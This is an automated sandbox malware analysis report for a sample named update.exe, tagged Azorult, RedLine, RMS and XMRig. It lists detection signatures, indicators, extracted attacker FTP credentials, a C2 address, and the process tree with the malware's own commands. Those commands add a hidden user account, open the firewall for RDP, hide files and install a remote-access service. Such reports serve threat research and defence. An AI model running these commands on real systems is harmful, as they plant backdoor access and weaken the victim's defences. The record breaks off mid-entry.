azorult | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

Analysis

max time kernel
302s
max time network
305s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe

Score

10^/10

azorult redline rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.141.184.35
Port:
21
Username:
alex
Password:
easypassword

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.91
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\system.exe	family_redline
C:\ProgramData\WindowsTask\system.exe	family_redline

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
C:\ProgramData\WindowsTask\MicrosoftHost.exe	xmrig
behavioral23/memory/5500-999-0x00007FF6F7F90000-0x00007FF6F8530000-memory.dmp	xmrig

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

Processes:

cmd.exeupdate.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE 24 IoCs

Processes:

wini.exewinit.execheat.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exetaskhostw.exeR8.exeRar.exeutorrent.exeazur.exeRDPWInst.exesystem.exeupdate.exeRDPWinst.exetaskhost.exeRDPWInst.exewinlogon.exeaudiodg.exeMicrosoftHost.exetaskhostw.exetaskhostw.exe

pid	process
4244	wini.exe
4416	winit.exe
1764	cheat.exe
4016	taskhost.exe
4560	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
2392	taskhostw.exe
3868	R8.exe
2916	Rar.exe
4352	utorrent.exe
3404	azur.exe
2396	RDPWInst.exe
560	system.exe
2160	update.exe
944	RDPWinst.exe
4176	taskhost.exe
5140	RDPWInst.exe
5324	winlogon.exe
3088	audiodg.exe
5500	MicrosoftHost.exe
1972	taskhostw.exe
5236	taskhostw.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\ProgramData\install\utorrent.exe	upx
C:\Programdata\Install\utorrent.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
C:\Programdata\WindowsTask\winlogon.exe	upx

Loads dropped DLL 5 IoCs

Processes:

azur.exesvchost.exe

pid process

3404 azur.exe
3404 azur.exe
3404 azur.exe
3404 azur.exe
1288 svchost.exe

pid	process
3404	azur.exe
3404	azur.exe
3404	azur.exe
3404	azur.exe
1288	svchost.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1108	icacls.exe
4152	icacls.exe
3508	icacls.exe
3644	icacls.exe
1020	icacls.exe
3096	icacls.exe
2372	icacls.exe
3948	icacls.exe
720	icacls.exe
1052	icacls.exe
4596	icacls.exe
768	icacls.exe
4056	icacls.exe
2248	icacls.exe
1156	icacls.exe
4048	icacls.exe
2588	icacls.exe
476	icacls.exe
4896	icacls.exe
196	icacls.exe
1492	icacls.exe
4984	icacls.exe
3328	icacls.exe
4084	icacls.exe
500	icacls.exe
3932	icacls.exe
3196	icacls.exe
1616	icacls.exe
3052	icacls.exe
4620	icacls.exe
1192	icacls.exe
2900	icacls.exe
4468	icacls.exe
4812	icacls.exe
4804	icacls.exe
2472	icacls.exe
4040	icacls.exe
3272	icacls.exe
184	icacls.exe
3876	icacls.exe
4708	icacls.exe
2408	icacls.exe
2100	icacls.exe
2952	icacls.exe
420	icacls.exe
3324	icacls.exe
1784	icacls.exe
2548	icacls.exe
1760	icacls.exe
4480	icacls.exe
4268	icacls.exe
4628	icacls.exe
3104	icacls.exe
1892	icacls.exe
4540	icacls.exe
2564	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

taskhostw.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
50 checkip.amazonaws.com

flow	ioc
16	ip-api.com
50	checkip.amazonaws.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

update.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe

Drops file in System32 directory 5 IoCs

Processes:

taskhost.exerutserv.exe

description	ioc	process
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe

Drops file in Program Files directory 26 IoCs

Processes:

update.exeRDPWInst.exeutorrent.exe

description	ioc	process
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winit.exeazur.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2980 schtasks.exe
4256 schtasks.exe
4904 schtasks.exe
644 schtasks.exe
4524 schtasks.exe
4576 schtasks.exe
2316 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1300 timeout.exe
1000 timeout.exe
4672 timeout.exe
2816 timeout.exe
1504 timeout.exe
1988 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

5540 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4720 taskkill.exe
4424 taskkill.exe
2300 taskkill.exe

pid	process
2980	schtasks.exe
4256	schtasks.exe
4904	schtasks.exe
644	schtasks.exe
4524	schtasks.exe
4576	schtasks.exe
2316	schtasks.exe

pid	process
1300	timeout.exe
1000	timeout.exe
4672	timeout.exe
2816	timeout.exe
1504	timeout.exe
1988	timeout.exe

pid	process
5540	ipconfig.exe

pid	process
4720	taskkill.exe
4424	taskkill.exe
2300	taskkill.exe

Modifies registry class 6 IoCs

Processes:

winit.exeR8.execmd.exewini.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe

NTFS ADS 3 IoCs

Processes:

taskhost.exeupdate.exeutorrent.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	utorrent.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1056 regedit.exe
1188 regedit.exe
Runs net.exe

pid	process
1056	regedit.exe
1188	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

pid	process
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
2728	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskhostw.exetaskhost.exe

pid process

2392 taskhostw.exe
4176 taskhost.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

620
620
620

pid	process
2392	taskhostw.exe
4176	taskhost.exe

pid	process
620
620
620

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exeRDPWInst.exesystem.exesvchost.exeRDPWinst.exesvchost.exeMicrosoftHost.exe

description	pid	process
Token: SeDebugPrivilege	4560	rutserv.exe
Token: SeDebugPrivilege	4716	rutserv.exe
Token: SeTakeOwnershipPrivilege	4476	rutserv.exe
Token: SeTcbPrivilege	4476	rutserv.exe
Token: SeTcbPrivilege	4476	rutserv.exe
Token: SeDebugPrivilege	4720	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	2396	RDPWInst.exe
Token: SeDebugPrivilege	560	system.exe
Token: SeAuditPrivilege	1288	svchost.exe
Token: SeDebugPrivilege	944	RDPWinst.exe
Token: SeAuditPrivilege	4952	svchost.exe
Token: SeLockMemoryPrivilege	5500	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	5500	MicrosoftHost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

update.exe

pid process

2160 update.exe
2160 update.exe
2160 update.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

update.exe

pid process

2160 update.exe
2160 update.exe
2160 update.exe

pid	process
2160	update.exe
2160	update.exe
2160	update.exe

pid	process
2160	update.exe
2160	update.exe
2160	update.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

winit.exetaskhost.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeupdate.exe

pid	process
4416	winit.exe
4016	taskhost.exe
4560	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
4724	WinMail.exe
4624	WinMail.exe
2392	taskhostw.exe
3868	R8.exe
2160	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

update.exewini.exeWScript.execmd.execheat.execmd.execmd.exe

description	pid	process	target process
PID 4768 wrote to memory of 4244	4768	update.exe	wini.exe
PID 4768 wrote to memory of 4244	4768	update.exe	wini.exe
PID 4768 wrote to memory of 4244	4768	update.exe	wini.exe
PID 4244 wrote to memory of 4068	4244	wini.exe	WScript.exe
PID 4244 wrote to memory of 4068	4244	wini.exe	WScript.exe
PID 4244 wrote to memory of 4068	4244	wini.exe	WScript.exe
PID 4244 wrote to memory of 4416	4244	wini.exe	winit.exe
PID 4244 wrote to memory of 4416	4244	wini.exe	winit.exe
PID 4244 wrote to memory of 4416	4244	wini.exe	winit.exe
PID 4068 wrote to memory of 856	4068	WScript.exe	cmd.exe
PID 4068 wrote to memory of 856	4068	WScript.exe	cmd.exe
PID 4068 wrote to memory of 856	4068	WScript.exe	cmd.exe
PID 856 wrote to memory of 1056	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1056	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1056	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1188	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1188	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1188	856	cmd.exe	regedit.exe
PID 856 wrote to memory of 1300	856	cmd.exe	timeout.exe
PID 856 wrote to memory of 1300	856	cmd.exe	timeout.exe
PID 856 wrote to memory of 1300	856	cmd.exe	timeout.exe
PID 4768 wrote to memory of 1764	4768	update.exe	cheat.exe
PID 4768 wrote to memory of 1764	4768	update.exe	cheat.exe
PID 4768 wrote to memory of 1764	4768	update.exe	cheat.exe
PID 1764 wrote to memory of 4016	1764	cheat.exe	taskhost.exe
PID 1764 wrote to memory of 4016	1764	cheat.exe	taskhost.exe
PID 1764 wrote to memory of 4016	1764	cheat.exe	taskhost.exe
PID 4768 wrote to memory of 4524	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 4524	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 4524	4768	update.exe	schtasks.exe
PID 856 wrote to memory of 4560	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 4560	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 4560	856	cmd.exe	rutserv.exe
PID 4768 wrote to memory of 4576	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 4576	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 4576	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 2316	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 2316	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 2316	4768	update.exe	schtasks.exe
PID 856 wrote to memory of 2728	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 2728	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 2728	856	cmd.exe	rutserv.exe
PID 4768 wrote to memory of 2980	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 2980	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 2980	4768	update.exe	schtasks.exe
PID 4768 wrote to memory of 4644	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 4644	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 4644	4768	update.exe	cmd.exe
PID 4644 wrote to memory of 4732	4644	cmd.exe	sc.exe
PID 4644 wrote to memory of 4732	4644	cmd.exe	sc.exe
PID 4644 wrote to memory of 4732	4644	cmd.exe	sc.exe
PID 856 wrote to memory of 4716	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 4716	856	cmd.exe	rutserv.exe
PID 856 wrote to memory of 4716	856	cmd.exe	rutserv.exe
PID 4768 wrote to memory of 212	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 212	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 212	4768	update.exe	cmd.exe
PID 212 wrote to memory of 2476	212	cmd.exe	sc.exe
PID 212 wrote to memory of 2476	212	cmd.exe	sc.exe
PID 212 wrote to memory of 2476	212	cmd.exe	sc.exe
PID 4768 wrote to memory of 2716	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 2716	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 2716	4768	update.exe	cmd.exe
PID 4768 wrote to memory of 2256	4768	update.exe	cmd.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

3952 attrib.exe
3712 attrib.exe
5224 attrib.exe
5244 attrib.exe
5264 attrib.exe

pid	process
3952	attrib.exe
3712	attrib.exe
5224	attrib.exe
5244	attrib.exe
5264	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4768

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4244

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:1056

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:1188

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:1300

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4560

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2728

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4716

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:3952

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:3712

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:4208

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:2504

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:2148

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4416

C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
4⤵
- Suspicious use of SetWindowsHookEx
PID:4724

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
5⤵
- Suspicious use of SetWindowsHookEx
PID:4624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
4⤵
PID:4632

C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:1000

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1764

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2392

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3868

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
6⤵
- Modifies registry class
PID:1312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4720

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:4672

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:2152

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:2916

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:2816

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
8⤵
PID:1768

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:4856

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:4588

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:4956

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:4728

C:\Windows\SysWOW64\net1.exe
